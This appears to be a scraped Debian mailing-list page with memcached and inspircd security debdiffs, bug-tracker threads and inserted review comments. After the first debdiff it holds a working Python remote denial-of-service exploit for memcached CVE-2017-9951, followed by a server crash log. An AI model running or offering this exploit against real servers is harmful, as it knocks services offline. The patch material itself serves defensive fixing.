@@ -1,3 +1,11 @@
+memcached (1.4.21-1.1+deb8u2) unstable; urgency=high
+
+  * Non-maintainer upload by the Security Team.
+  * Fix CVE-2017-9951 by checking the integer length of commands that adds or
+replaces key/value pair
+
+ -- Guillaume Delacour <g...@iroqwa.org>  Mon, 24 Jul 2017 19:54:18 +
+
 memcached (1.4.21-1.1+deb8u1) jessie-security; urgency=high
 
   * Non-maintainer upload by the Security Team.
diff -Nru memcached-1.4.21/debian/patches/09_CVE-2017-9951.patch 
memcached-1.4.21/debian/patches/09_CVE-2017-9951.patch
--- memcached-1.4.21/debian/patches/09_CVE-2017-9951.patch  1970-01-01 
00:00:00.0 +
+++ memcached-1.4.21/debian/patches/09_CVE-2017-9951.patch  2017-07-24 
19:59:20.0 +
@@ -0,0 +1,37 @@
+From 328629445c71e6c17074f6e9e0e3ef585b58f167 Mon Sep 17 00:00:00 2001
+From: dormando <dorma...@rydia.net>
+Date: Tue, 4 Jul 2017 00:32:39 -0700
+Subject: [PATCH] sanity check
+Origin: upstream, 
https://github.com/memcached/memcached/commit/328629445c71e6c17074f6e9e0e3ef585b58f167
+
+---
+ items.c | 2 ++
+ memcached.c | 2 +-
+ 2 files changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/items.c b/items.c
+index 637e5e745..83a2ea37d 100644
+--- a/items.c
 b/items.c
+@@ -368,6 +368,8 @@ void item_free(item *it) {
+ bool item_size_ok(const size_t nkey, const int flags, const int nbytes) {
+ char prefix[40];
+ uint8_t nsuffix;
++if (nbytes < 2)
++return false;
+ 
+ size_t ntotal = item_make_header(nkey + 1, flags, nbytes,
+  prefix, );
+diff --git a/memcached.c b/memcached.c
+index 0f0335795..a89df965d 100644
+--- a/memcached.c
 b/memcached.c
+@@ -4967,7 +4967,7 @@ static void drive_machine(conn *c) {
+ 
+ case conn_swallow:
+ /* we are reading sbytes and throwing them away */
+-if (c->sbytes == 0) {
++if (c->sbytes <= 0) {
+ conn_set_state(c, conn_new_cmd);
+ break;
+ }
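Review bot: the embedded patch for 1.4.21 keeps the hunk positions and index lines of the upstream commit ("@@ -368,6 +368,8 @@" in items.c, "@@ -4967,7 +4967,7 @@" in memcached.c), identical to the copy in the 1.4.33 debdiff, so against the 1.4.21 sources it probably applies only with offsets; refresh it against the 1.4.21 tree so the positions match, and drop the leading "From 3286... Mon Sep 17" mbox line from the patch header.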
diff -Nru memcached-1.4.21/debian/patches/series 
memcached-1.4.21/debian/patches/series
--- memcached-1.4.21/debian/patches/series  2016-11-01 21:10:45.0 
+
+++ memcached-1.4.21/debian/patches/series  2017-07-24 20:07:26.0 
+
@@ -5,3 +5,4 @@
 06_eol_comment_handling.patch
 07_disable_tests.patch
 08_CVE-2016-8704_CVE-2016-8705_CVE-2016-8706.patch
+09_CVE-2017-9951.patch
#!/usr/bin/python
# thanks https://packetstormsecurity.com/files/121445/killthebox.py.txt &&
# https://www.twistlock.com/2017/07/13/cve-2017-9951-heap-overflow-memcached-server-1-4-38-twistlock-vulnerability-report/
import sys
import socket

print "Memcached Remote DoS"
if len(sys.argv) != 3:
    print "Usage: %s  " %(sys.argv[0])
    sys.exit(1)

target = sys.argv[1]
port = sys.argv[2]

print "[+] Target Host: %s" %(target)
print "[+] Target Port: %s" %(port)

kill = """\x80\x12\x00\x01\x08\x00\x00\x00\xff\xff\xff"""
kill +="""\xe8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"""
kill +="""\x00\xff\xff\xff\xff\x01\x00\x00\0x{}""".format("41"*1000)

hax = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
try:
    hax.connect((target, int(port)))
    print "[+] Connected, firing payload!"
except:
    print "[-] Connection Failed... Is there even a target?"
    sys.exit(1)
try:
    hax.send(kill)
    print "[+] Payload Sent!"
except:
    print "[-] Payload Sending Failure... WTF?"
    sys.exit(1)
hax.close()
print "[*] Should be dead..."

<26 new auto-negotiating client connection
26: going from conn_new_cmd to conn_waiting
26: going from conn_waiting to conn_read
26: going from conn_read to conn_parse_cmd
26: Client using the binary protocol
<26 Read binary protocol data:
<260x80 0x12 0x00 0x01
<260x08 0x00 0x00 0x00
<260xff 0xff 0xff 0xe8
<260x00 0x00 0x00 0x00
<260x00 0x00 0x00 0x00
<260x00 0x00 0x00 0x00
26: going from conn_parse_cmd to conn_nread
<26 ADD x Value len is -33
>26 Writing an error: Out of memory allocating item
>26 Writing bin response:
>26   0x81 0x12 0x00 0x00
>26   

Bug#853544: memcached: ftbfs with GCC-7

2017-07-24 Thread Guillaume Delacour
tags 853544 + pending
thanks

On Tue, 21 Mar 2017 21:37:27 +0100 Guillaume Delacour <g...@iroqwa.org>
wrote:
> tags 853544 upstream fixed-upstream
> thanks
> 

> 
> All is now fine with release 1.4.36
> (https://github.com/memcached/memcached/commit/64bbbf4c7655a540247db4b608b00f809742f24b),
> will be released after the freeze in unstable.
> 

I've prepared version 1.5.0, which will be uploaded soon.

-- 
Guillaume Delacour





Bug#869479: memcached: New upstream version available

2017-07-24 Thread Guillaume Delacour
tags 869479 + pending
thanks

On Sun, Jul 23, 2017 at 05:14:52PM +0200, Salvatore Bonaccorso wrote:
> Source: memcached
> Severity: wishlist
> 
> Hi

Hi,

> 
> There is a new upstream version available, v1.5.0. Could you please
> package the new version?

I've prepared it on mentors [0] and my current mentor will upload it soon 
surely at the end of this week.

[0]: 
https://mentors.debian.net/debian/pool/main/m/memcached/memcached_1.5.0-1.dsc

> 
> Regards,
> Salvatore
> 

-- 
Guillaume Delacour




Bug#842634: Bug#851877: fails every time

2017-05-14 Thread Guillaume Delacour
Hi,

On 15/05/2017 at 00:50, Adam Borowski wrote:

> 
> So it's a fully _reproducible_ bug, with a well-defined immediate cause
> (even if we haven't identified the indirect cause yet) -- unlike the
> original report by Santiago Villa.  Thus, it looks we have two different
> bugs that just happen to trigger the same failure mode.
> 
> And thus, even if we fix the schroot issue, Santiago's bug likely won't be
> fixed.
>  
>> Now, the next question is: where does this /etc/hosts come from? The file
>> is present in the above form directly after unpacking the schroot tarball,
>> before even entering the schroot.
> 
>> Running debootstrap does not produce an /etc/hosts in --variant=minbase and
>> --variant=buildd. When run without --variant, it does produce an
>> /etc/hosts, but that looks correct:
> [snip]
>> So, where does the file get mangled? I can’t find any traces in the schroot
>> and sbuild sources. Does anyone know by chance?
> 
> Even more puzzling: I just recreated the chroot again, and despite using the
> very same command to do so as before (last on 2017-05-04) there's no
> /etc/hosts in the chroot now, which makes sslh build correctly.
> 
> The version from 2017-05-04 includes has an /etc/hosts, with ::1 replaced by
> 127.0.0.1 just as you noticed.  And I see no uploads of debootstrap, sbuild,
> schroot or a package that looks related in that time period.
> 
> Got an unrelated big build running at the moment, once it's done I'll boot
> from a snapshot (got backups from 2017-05-01 (plus earliers) and dailies
> since 2017-05-06) to see if it's a matter of an installed package.
> 
> But again, this is probably unrelated to Santiago's bug other than for the
> results.

As this bug is not related to the sslh package itself, I've removed the
pending tag; I let Michael revert
https://anonscm.debian.org/cgit/collab-maint/sslh.git/commit/?id=243bb3faa682afa8168664eaf5a4f72cfc21ee27
and closing this bug to disable the autoremoval in testing.


-- 
Guillaume Delacour





Bug#851877: fails every time

2017-05-09 Thread Guillaume Delacour
Hi,

On Sat, 6 May 2017 20:57:44 +0200 Adam Borowski <kilob...@angband.pl> wrote:
> On Sat, May 06, 2017 at 08:00:11PM +0200, Michael Stapelberg wrote:
> > Thanks. It seems like getaddrinfo() is returning two results when resolving
> > localhost. Can you provide the contents of your hostname resolution-related
> > configuration please? I.e., /etc/hosts, /etc/resolv.conf,
> > /etc/nsswitch.conf, anything else you might have tweaked in that area.
> 
> nsswitch.conf: always default.
> 
> 
> amd64 (100% fails on all chroots):
> .--[ /etc/hosts ]
> 127.0.0.1 localhost
> 127.0.1.1 umbar.angband.pl umbar
> #lots of commented out stuff
> 
> # The following lines are desirable for IPv6 capable hosts
> ::1 localhost ip6-localhost ip6-loopback
> ff02::1 ip6-allnodes
> ff02::2 ip6-allrouters
> +--[ /etc/resolv.conf ]
> domain angband.pl
> search angband.pl
> nameserver 2001:6a0:118::3:2
> `
> 
> armhf (100% fails on all chroots):
> .--[ /etc/hosts ]
> 127.0.0.1 localhost
> ::1   localhost ip6-localhost ip6-loopback
> fe00::0   ip6-localnet
> ff00::0   ip6-mcastprefix
> ff02::1   ip6-allnodes
> ff02::2   ip6-allrouters
> 
> 127.0.0.1  kholdan kholdan.angband.pl
> 2001:6a0:118::3:6 narchost
> #2001:6a0:118::3:3 apt.angband.pl
> +--[ /etc/resolv.conf ]
> domain angband.pl
> search angband.pl
> nameserver 10.0.1.2
> `
> 
> arm64 (100% ok on all chroots):
> .--[ /etc/hosts ]
> 127.0.0.1 localhost
> 127.0.1.1 sirius.angband.pl sirius
> 
> # The following lines are desirable for IPv6 capable hosts
> ::1 localhost ip6-localhost ip6-loopback
> fe00::0 ip6-localnet
> ff00::0 ip6-mcastprefix
> ff02::1 ip6-allnodes
> ff02::2 ip6-allrouters
> +--[ /etc/resolv.conf ]
> domain angband.pl
> nameserver 10.0.1.2
> nameserver 2001:6a0:118::3:2
> `
> 

I've also spent time trying to reproduce this, and despite my attempt to
disable localhost IPv6 resolution [0], I already encountered issues for
echosrv on ::1.

You can also try to replace any occurrence of `localhost` in the t file with
127.0.0.1. If the testsuite causes trouble, I'll disable IPv6 completely,
even on loopback (I didn't like the idea at first glance because I want to
keep the testsuite as close as possible to what upstream ships).

Then, any other special configurations in /etc/gai.conf?

[0]:
https://anonscm.debian.org/cgit/collab-maint/sslh.git/tree/debian/patches/ftbfs_localhost.diff

-- 
Guillaume Delacour





Bug#856568: memcached: Permission error creating pidfile with systemd

2017-03-21 Thread Guillaume Delacour
tags 856568 moreinfo
thanks

Hi,

On Thu, Mar 02, 2017 at 04:04:33PM +0100, Teun wrote:
> After adding the option: "-P /var/run/memcached.pid" to '/etc/memcached.conf',
> I get the following error:
> 
> systemd-memcached-wrapper[2577]: Could not open the pid file
> /var/run/memcached.pid.tmp for writing: Permission denied
> 

Is there any reason to have a pid file for a systemd-managed service?
Systemd handles the crash of the process well:

# pkill -9 memcached
# service memcached status
● memcached.service - memcached daemon
   Loaded: loaded (/lib/systemd/system/memcached.service; enabled)
   Active: failed (Result: signal) since Tue 2017-03-21 23:12:47 GMT; 2s ago
  Process: 4204 ExecStart=/usr/share/memcached/scripts/systemd-memcached-wrapper /etc/memcached.conf (code=killed, signal=KILL)
 Main PID: 4204 (code=killed, signal=KILL)

Mar 21 23:11:46 jessie systemd[1]: Started memcached daemon.
Mar 21 23:12:47 jessie systemd[1]: memcached.service: main process exited, code=killed, status=9/KILL
Mar 21 23:12:47 jessie systemd[1]: Unit memcached.service entered failed state.

As the official systemd documentation says [1][2], it is recommended to use
PIDFile if the service forks and exits at startup. The systemd wrapper script
does not exit after startup and can run in the foreground.


[1]: https://www.freedesktop.org/software/systemd/man/systemd.service.html#Type=
[2]: https://www.freedesktop.org/software/systemd/man/systemd.service.html#PIDFile=

-- 
Guillaume Delacour




Bug#853544: memcached: ftbfs with GCC-7

2017-03-21 Thread Guillaume Delacour
tags 853544 upstream fixed-upstream
thanks


On Tue, 31 Jan 2017 09:33:50 + Matthias Klose <d...@debian.org> wrote:

> items.c:730:45: error: '%d' directive output truncated writing between 10 and 
> 11 bytes into a region of size 8 [-Werror=format-truncation=]
>  snprintf(key, sizeof(key), "%d", i * 32);
>  ^~
> items.c:730:44: note: using the range [-2147483648, 2147483647] for directive 
> argument
>  snprintf(key, sizeof(key), "%d", i * 32);
> ^~~~
> In file included from /usr/include/stdio.h:938:0,
>  from /usr/include/event2/event.h:195,
>  from /usr/include/event.h:71,
>  from memcached.h:16,
>  from items.c:2:
> /usr/include/x86_64-linux-gnu/bits/stdio2.h:64:10: note: format output 
> between 11 and 12 bytes into a destination of size 8
>return __builtin___snprintf_chk (__s, __n, __USE_FORTIFY_LEVEL - 1,
>   ^~~~
> __bos (__s), __fmt, __va_arg_pack ());
> ~
> items.c: In function 'item_stats_sizes':
> items.c:730:45: error: '%d' directive output truncated writing between 10 and 
> 11 bytes into a region of size 8 [-Werror=format-truncation=]
>  snprintf(key, sizeof(key), "%d", i * 32);
>  ^~
> items.c:730:44: note: using the range [-2147483648, 2147483647] for directive 
> argument
>  snprintf(key, sizeof(key), "%d", i * 32);
> ^~~~
> In file included from /usr/include/stdio.h:938:0,
>  from /usr/include/event2/event.h:195,
>  from /usr/include/event.h:71,
>  from memcached.h:16,

All is now fine with release 1.4.36
(https://github.com/memcached/memcached/commit/64bbbf4c7655a540247db4b608b00f809742f24b),
will be released after the freeze in unstable.


-- 
Guillaume Delacour





Bug#842812: memcached: CVE-2016-8705

2016-11-02 Thread Guillaume Delacour
Fix is the same as #842814.

On Tue, 01 Nov 2016 14:05:19 +0100 Salvatore Bonaccorso
<car...@debian.org> wrote:
> Source: memcached
> Version: 1.4.31-1
> Severity: important
> Tags: security upstream
> 
> Hi,
> 
> the following vulnerability was published for memcached.
> 
> CVE-2016-8705[0]:
> Memcached Server Update Remote Code Execution Vulnerability
> 
> It is reproducible with the (fixed) reproducer on the TALOS site, when
> running under valgrind easily.
> 
> If you fix the vulnerability please also make sure to include the
> CVE (Common Vulnerabilities & Exposures) id in your changelog entry.
> 
> For further information see:
> 
> [0] https://security-tracker.debian.org/tracker/CVE-2016-8705
> [1] http://www.talosintelligence.com/reports/TALOS-2016-0220/
> 
> Please adjust the affected versions in the BTS as needed.
> 
> Regards,
> Salvatore
> 
> 

-- 
Guillaume Delacour





Bug#842811: memcached: CVE-2016-8704

2016-11-02 Thread Guillaume Delacour
Fix is the same as for #842814.

On Tue, 01 Nov 2016 14:00:07 +0100 Salvatore Bonaccorso
<car...@debian.org> wrote:
> Source: memcached
> Version: 1.4.31-1
> Severity: important
> Tags: security upstream
> 
> Hi,
> 
> the following vulnerability was published for memcached.
> 
> CVE-2016-8704[0]:
> Memcached Server Append/Prepend Remote Code Execution Vulnerability
> 
> If you fix the vulnerability please also make sure to include the
> CVE (Common Vulnerabilities & Exposures) id in your changelog entry.
> 
> For further information see:
> 
> [0] https://security-tracker.debian.org/tracker/CVE-2016-8704
> [1] http://www.talosintelligence.com/reports/TALOS-2016-0219/
> 
> Please adjust the affected versions in the BTS as needed.
> 
> Regards,
> Salvatore
> 
> 

-- 
Guillaume Delacour





Bug#842814: memcached: CVE-2016-8706

2016-11-02 Thread Guillaume Delacour
Please see attached the debdiff.
Also, please note that I can't upload to security-master myself as I'm
neither a DD nor a DM.

On Tue, 01 Nov 2016 14:08:44 +0100 Salvatore Bonaccorso
<car...@debian.org> wrote:
> Source: memcached
> Version: 1.4.31-1
> Severity: important
> Tags: security upstream
> 
> Hi,
> 
> the following vulnerability was published for memcached.
> 
> CVE-2016-8706[0]:
> |Memcached Server SASL Authentication Remote Code Execution
> |Vulnerability
> 
> It is easily reproducible with the TALOS reproducer when memcached
> enabled SASL authentication and running under valgrind to see the
> crash.
> 
> If you fix the vulnerability please also make sure to include the
> CVE (Common Vulnerabilities & Exposures) id in your changelog entry.
> 
> For further information see:
> 
> [0] https://security-tracker.debian.org/tracker/CVE-2016-8706
> [1] http://www.talosintelligence.com/reports/TALOS-2016-0221/
> 
> Please adjust the affected versions in the BTS as needed.
> 
> Regards,
> Salvatore
> 
> 

-- 
Guillaume Delacour
diff -Nru memcached-1.4.21/debian/changelog memcached-1.4.21/debian/changelog
--- memcached-1.4.21/debian/changelog   2015-03-07 13:01:25.0 +
+++ memcached-1.4.21/debian/changelog   2016-11-03 02:14:20.0 +
@@ -1,3 +1,12 @@
+memcached (1.4.21-1.1+deb8u1) jessie-security; urgency=high
+
+  * CVE-2016-8704: Fix Append/Prepend Remote Code Execution (Closes: #842811)
+  * CVE-2016-8705: Fix Update Remote Code Execution (Closes: #842812)
+  * CVE-2016-8706: Fix SASL Authentication Remote Code Execution
+(Closes: #842814)
+
+ -- Guillaume Delacour <g...@iroqwa.org>  Thu, 03 Nov 2016 02:26:55 +0100
+
 memcached (1.4.21-1.1) unstable; urgency=medium
 
   * Non-maintainer upload.
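Review bot: the new changelog entry lists the three CVEs and the bugs they close but never names the file that carries the fix. A sub-item under the entries pointing at debian/patches/08_CVE-2016-8704_8705_8706.patch, with a note that it is the upstream commit, would let the security team map the entry to the patch without opening the debdiff.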
diff -Nru memcached-1.4.21/debian/patches/08_CVE-2016-8704_8705_8706.patch 
memcached-1.4.21/debian/patches/08_CVE-2016-8704_8705_8706.patch
--- memcached-1.4.21/debian/patches/08_CVE-2016-8704_8705_8706.patch
1970-01-01 00:00:00.0 +
+++ memcached-1.4.21/debian/patches/08_CVE-2016-8704_8705_8706.patch
2016-11-03 01:31:47.0 +
@@ -0,0 +1,50 @@
+From bd578fc34b96abe0f8d99c1409814a09f51ee71c Mon Sep 17 00:00:00 2001
+From: dormando <dorma...@rydia.net>
+Date: Wed, 12 Oct 2016 13:50:47 -0700
+Subject: [PATCH] CVE reported by cisco talos
+Origin: upstream,
+https://github.com/memcached/memcached/commit/bd578fc34b96abe0f8d99c1409814a09f51ee71c
+Last-Update: 2016-11-03
+
+---
+ items.c |  3 +++
+ memcached.c | 10 --
+ 2 files changed, 11 insertions(+), 2 deletions(-)
+
+diff --git a/items.c b/items.c
+index 9e6d921..a1cca4a 100644
+--- a/items.c
 b/items.c
+@@ -148,6 +148,9 @@ item *do_item_alloc(char *key, const size_t nkey, const 
unsigned int flags,
+ uint8_t nsuffix;
+ item *it = NULL;
+ char suffix[40];
++if (nbytes < 2 || nkey < 0)
++return 0;
++
+ size_t ntotal = item_make_header(nkey + 1, flags, nbytes, suffix, 
);
+ if (settings.use_cas) {
+ ntotal += sizeof(uint64_t);
+diff --git a/memcached.c b/memcached.c
+index dc1f636..ad423a0 100644
+--- a/memcached.c
 b/memcached.c
+@@ -1997,10 +1997,16 @@ static bool authenticated(conn *c) {
+ static void dispatch_bin_command(conn *c) {
+ int protocol_error = 0;
+ 
+-int extlen = c->binary_header.request.extlen;
+-int keylen = c->binary_header.request.keylen;
++uint8_t extlen = c->binary_header.request.extlen;
++uint16_t keylen = c->binary_header.request.keylen;
+ uint32_t bodylen = c->binary_header.request.bodylen;
+ 
++if (keylen > bodylen || keylen + extlen > bodylen) {
++write_bin_error(c, PROTOCOL_BINARY_RESPONSE_UNKNOWN_COMMAND, NULL, 0);
++c->write_and_go = conn_closing;
++return;
++}
++
+ if (settings.sasl && !authenticated(c)) {
+ write_bin_error(c, PROTOCOL_BINARY_RESPONSE_AUTH_ERROR, NULL, 0);
+ c->write_and_go = conn_closing;
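Review bot: in the items.c part, `nkey < 0` can never be true because do_item_alloc() takes `nkey` as `const size_t`, so only `nbytes < 2` does any work in that guard. Drop the dead comparison, or replace it with the bound that was actually intended, and return NULL rather than 0 since the function returns `item *`. In dispatch_bin_command(), `keylen > bodylen` is already implied by `keylen + extlen > bodylen` now that both are unsigned, and the malformed-length case is answered with PROTOCOL_BINARY_RESPONSE_UNKNOWN_COMMAND; a one-line comment saying that this status is deliberate would help whoever reads a server log for these rejections.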
diff -Nru memcached-1.4.21/debian/patches/series 
memcached-1.4.21/debian/patches/series
--- memcached-1.4.21/debian/patches/series  2015-03-07 13:01:25.0 
+
+++ memcached-1.4.21/debian/patches/series  2016-11-03 01:32:38.0 
+
@@ -4,3 +4,4 @@
 04_add_init_retry.patch
 06_eol_comment_handling.patch
 07_disable_tests.patch
+08_CVE-2016-8704_8705_8706.patch




Bug#836706: certificate spoofing via crafted SASL messages

2016-09-06 Thread Guillaume Delacour

Please see attached the debdiff.
Also, please note that I can't upload to security-master myself as I'm
neither a DD nor a DM.

On 06/09/2016 at 00:02, Guillaume Delacour wrote:
> 
> 
> On 05/09/2016 at 22:41, James Lu wrote:
>> Hi,
> 
> Hi,
> 
>>
>> Just to narrow things down a bit, the relevant fix for InspIRCd 2.0 is
>> this commit
>> https://github.com/inspircd/inspircd/commit/74fafb7f11b06747f69f182ad5e3769b665eea7a
> 
> Yes, I've talked to upstream a few hours ago to include this particular
> fix to 2.0.17; upload of 2.0.23 will follow to unstable.
> 
>>
>> Best,
>> James
>>
> 

-- 
Guillaume Delacour


diff -Nru inspircd-2.0.17/debian/changelog inspircd-2.0.17/debian/changelog
--- inspircd-2.0.17/debian/changelog2016-03-22 19:31:22.0 +0100
+++ inspircd-2.0.17/debian/changelog2016-09-06 21:29:13.0 +0200
@@ -1,3 +1,10 @@
+inspircd (2.0.17-1+deb8u2) jessie-security; urgency=high
+
+  * m_sasl: don't allow AUTHENTICATE with mechanisms with a space
+(CVE-2016-7142)
+
+ -- Guillaume Delacour <g...@iroqwa.org>  Tue, 06 Sep 2016 01:58:19 +0200
+
 inspircd (2.0.17-1+deb8u1) jessie-security; urgency=high
 
   * Non-maintainer upload by the Wheezy LTS Team. 
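Review bot: the changelog entry names CVE-2016-7142 but carries no `(Closes: #836706)`, although this debdiff is posted to that bug. Add the closure next to the CVE id, and mention debian/patches/CVE-2016-7142.patch so the entry points at the file it introduces.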
diff -Nru inspircd-2.0.17/debian/patches/CVE-2016-7142.patch 
inspircd-2.0.17/debian/patches/CVE-2016-7142.patch
--- inspircd-2.0.17/debian/patches/CVE-2016-7142.patch  1970-01-01 
01:00:00.0 +0100
+++ inspircd-2.0.17/debian/patches/CVE-2016-7142.patch  2016-09-06 
21:29:13.0 +0200
@@ -0,0 +1,31 @@
+From 74fafb7f11b06747f69f182ad5e3769b665eea7a Mon Sep 17 00:00:00 2001
+From: Adam <a...@anope.org>
+Date: Fri, 2 Sep 2016 22:57:03 -0400
+Subject: [PATCH] m_sasl: don't allow AUTHENTICATE with mechanisms with a space
+
+---
+ src/modules/m_sasl.cpp | 4 
+ 1 file changed, 4 insertions(+)
+
+diff --git a/src/modules/m_sasl.cpp b/src/modules/m_sasl.cpp
+index 9cb5592..16a1535 100644
+--- a/src/modules/m_sasl.cpp
 b/src/modules/m_sasl.cpp
+@@ -189,6 +189,7 @@ class CommandAuthenticate : public Command
+   : Command(Creator, "AUTHENTICATE", 1), authExt(ext), cap(Cap)
+   {
+   works_before_reg = true;
++  allow_empty_last_param = false;
+   }
+ 
+   CmdResult Handle (const std::vector& parameters, User 
*user)
+@@ -199,6 +200,9 @@ class CommandAuthenticate : public Command
+   if (!cap.ext.get(user))
+   return CMD_FAILURE;
+ 
++  if (parameters[0].find(' ') != std::string::npos || 
parameters[0][0] == ':')
++  return CMD_FAILURE;
++
+   SaslAuthenticator *sasl = authExt.get(user);
+   if (!sasl)
+   authExt.set(user, new SaslAuthenticator(user, 
parameters[0]));
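Review bot: the new check in Handle() reads `parameters[0][0]`, and the only thing that keeps that parameter from being empty is the `allow_empty_last_param = false` added in the constructor a few lines earlier. The two additions depend on each other, so either say so in a comment or test `parameters[0].empty()` first, so that a later change to the constructor cannot silently weaken the check. The embedded patch also has no DEP-3 `Origin:` line recording the upstream commit it was taken from.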
diff -Nru inspircd-2.0.17/debian/patches/series 
inspircd-2.0.17/debian/patches/series
--- inspircd-2.0.17/debian/patches/series   2016-03-22 19:29:23.0 
+0100
+++ inspircd-2.0.17/debian/patches/series   2016-09-06 22:55:05.0 
+0200
@@ -2,3 +2,4 @@
 01_dpkg-buildflags_support.diff
 03_gnutls_crypt_api_instead_gcrypt.diff
 CVE-2015-8702.patch
+CVE-2016-7142.patch




Bug#836706: certificate spoofing via crafted SASL messages

2016-09-05 Thread Guillaume Delacour


On 05/09/2016 at 22:41, James Lu wrote:
> Hi,

Hi,

> 
> Just to narrow things down a bit, the relevant fix for InspIRCd 2.0 is
> this commit
> https://github.com/inspircd/inspircd/commit/74fafb7f11b06747f69f182ad5e3769b665eea7a

Yes, I've talked to upstream a few hours ago to include this particular
fix to 2.0.17; upload of 2.0.23 will follow to unstable.

> 
> Best,
> James
> 

-- 
Guillaume Delacour





Bug#790275: qstat: FTBFS with glibc 2.21 and gcc-5

2016-02-08 Thread Guillaume Delacour
On Sat, 31 Oct 2015 15:15:33 +0100 Guillaume Delacour <g...@iroqwa.org>
wrote:
> 
> Upstream seems to have modified qstat.c to include strndup() only if
> needed in recent version of qstat :
> 
> https://github.com/multiplay/qstat/commit/9977e09cebc340208ab097f8db619ebc80756859

I've uploaded a fix on mentors:
http://mentors.debian.net/debian/pool/main/q/qstat/qstat_2.15-2.dsc.

I'm waiting for Jordi to upload it to the archive.

-- 
Guillaume Delacour





Bug#809008: inspircd: FTBFS: rmdir: failed to remove '[..]/debian/inspircd/usr/lib/inspircd/data': No such file or directory

2015-12-28 Thread Guillaume Delacour
retitle 809008 "FTBFS with perl 5.22: Calling POSIX::tmpnam() is deprecated"
thanks

On 26/12/2015 at 04:26, Chris Lamb wrote:
> Source: inspircd
> Version: 2.0.20-4
> Severity: serious
> Justification: fails to build from source
> User: reproducible-bui...@lists.alioth.debian.org
> Usertags: ftbfs
> X-Debbugs-Cc: reproducible-bui...@lists.alioth.debian.org
> 
> Dear Maintainer,
> 
> inspircd fails to build from source in unstable/amd64:
> 
>   [..]
>   # delete empty data and log dir
>   rmdir 
> /home/lamby/temp/cdt.20151226032303.NJlegBmZbO/inspircd-2.0.20/debian/inspircd/usr/lib/inspircd/data
>  \
>   
> /home/lamby/temp/cdt.20151226032303.NJlegBmZbO/inspircd-2.0.20/debian/inspircd/usr/lib/inspircd/logs
>   rmdir: failed to remove 
> '/home/lamby/temp/cdt.20151226032303.NJlegBmZbO/inspircd-2.0.20/debian/inspircd/usr/lib/inspircd/data':
>  No such file or directory
>   rmdir: failed to remove 
> '/home/lamby/temp/cdt.20151226032303.NJlegBmZbO/inspircd-2.0.20/debian/inspircd/usr/lib/inspircd/logs':
>  No such file or directory
>   debian/rules:51: recipe for target 'override_dh_auto_install' failed
>   make[1]: *** [override_dh_auto_install] Error 1
>   make[1]: Leaving directory 
> '/home/lamby/temp/cdt.20151226032303.NJlegBmZbO/inspircd-2.0.20'
>   debian/rules:81: recipe for target 'binary' failed
>   make: *** [binary] Error 2
> 
>   [..]
> 
> The full build log is attached.

The real problem is:

[...]
Evaluating perl code for module m_pgsql.cpp ...

Configuration failed. The following error occured:

Calling POSIX::tmpnam() is deprecated at make/utilities.pm line 407,
 line 32.
[...]

Upstream uses POSIX::tmpnam in this file, which seems (I can't find any
other pointer than [1]) to be deprecated since perl 5.22; I'll propose
that they use File::Temp instead and prepare a new -4 version.

[1]:
https://metacpan.org/pod/distribution/perl/ext/POSIX/lib/POSIX.pod#FUNCTIONS

-- 
Guillaume Delacour





Bug#784357: memcached multi instance startup/shutdown broken

2015-12-28 Thread Guillaume Delacour
tags 784357 +help

Hi,

On Wed, 16 Dec 2015 14:26:38 -0500 Jonathan Champ <roya...@gmail.com> wrote:
> Ran into this again today. Hope there's been some progress?

Not for the moment; I'm sorry that the only way I can propose for now is
to create one systemd unit file per instance needed.

I'll try to find a solution in the middle of January.

-- 
Guillaume Delacour





Bug#804010: New version 1.0.1 available

2015-11-04 Thread Guillaume Delacour
On Wed, Nov 04, 2015 at 09:16:04AM +0100, Sebastien Bacher wrote:
> Package: gdisk
> Version: 1.0.0-3
> 
> There is a new 1.0.1 version available that fixes some EFI issues and
> potential segfaults on some architectures, it would be nice to have that
> update in Debian

Sure, I prepared this package a few days ago on mentors:

http://mentors.debian.net/debian/pool/main/g/gdisk/gdisk_1.0.1-1.dsc

My main sponsor hasn't replied to me yet; you can review the package and
upload it if you have some time. Thanks in advance.

-- 
Guillaume Delacour




Bug#789860: php5-imagick: Segmentation fault when accessing an unknown property

2015-10-31 Thread Guillaume Delacour
fixed 789860 3.2.0~rc1-1
thanks

Hi,

It seems to be unreproducible in versions:
- 3.2.0~rc1-1 (stable)
- 3.3.0~rc2-1 (testing/unstable)

On 24/06/2015 at 23:37, Jerry wrote:
> Package: php5-imagick
> Version: 3.1.0~rc1-1+b2
> Severity: normal
> 
> The following code produces a segmentation fault:
> 
> <?php
> $im = new \Imagick;
> $im->foo;
> ?>
> 
> It can also be reproduced on the command line:
> 
> jerry@box:~$ php -r '$im = new \Imagick(); $im->foo;'
> Segmentation fault
> 
> -- System Information:
> Debian Release: 7.8
>   APT prefers oldstable-updates
>   APT policy: (500, 'oldstable-updates'), (500, 'oldstable')
> Architecture: i386 (i686)
> 
> Kernel: Linux 2.6.32-30-pve (SMP w/2 CPU cores)
> Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
> Shell: /bin/sh linked to /bin/dash
> 
> Versions of packages php5-imagick depends on:
> ii  libc6   2.13-38+deb7u8
> ii  libmagickcore5  8:6.7.7.10-5+deb7u3
> ii  libmagickwand5  8:6.7.7.10-5+deb7u3
> ii  php5-cli [phpapi-20100525+lfs]  5.4.41-0+deb7u1
> ii  php5-common 5.4.41-0+deb7u1
> ii  php5-fpm [phpapi-20100525+lfs]  5.4.41-0+deb7u1
> ii  ucf 3.0025+nmu3
> 
> Versions of packages php5-imagick recommends:
> ii  ghostscript  9.05~dfsg-6.3+deb7u1
> ii  ttf-dejavu-core  2.33-3
> 
> php5-imagick suggests no packages.
> 
> -- no debconf information
> 

-- 
Guillaume Delacour





Bug#790275: qstat: FTBFS with glibc 2.21 and gcc-5

2015-10-31 Thread Guillaume Delacour
tag 790275 fixed-upstream
thanks

On Sat, 27 Jun 2015 13:08:22 -0700 Daniel Schepler <dschep...@gmail.com>
wrote:
> Source: qstat
> Version: 2.15-1
> Severity: normal
> 
> From my pbuilder build log, using a setup preferring glibc and gcc-defaults
> from experimental:
> 
> ...
> gcc -DHAVE_CONFIG_H -I.   -Dsysconfdir=\"/etc\" -D_FORTIFY_SOURCE=2 -DDEBUG 
> -DENABLE_DUMP  -g -O2 -fstack-protector-strong -Wformat 
> -Werror=format-security -Wall -c -o md5.o md5.c
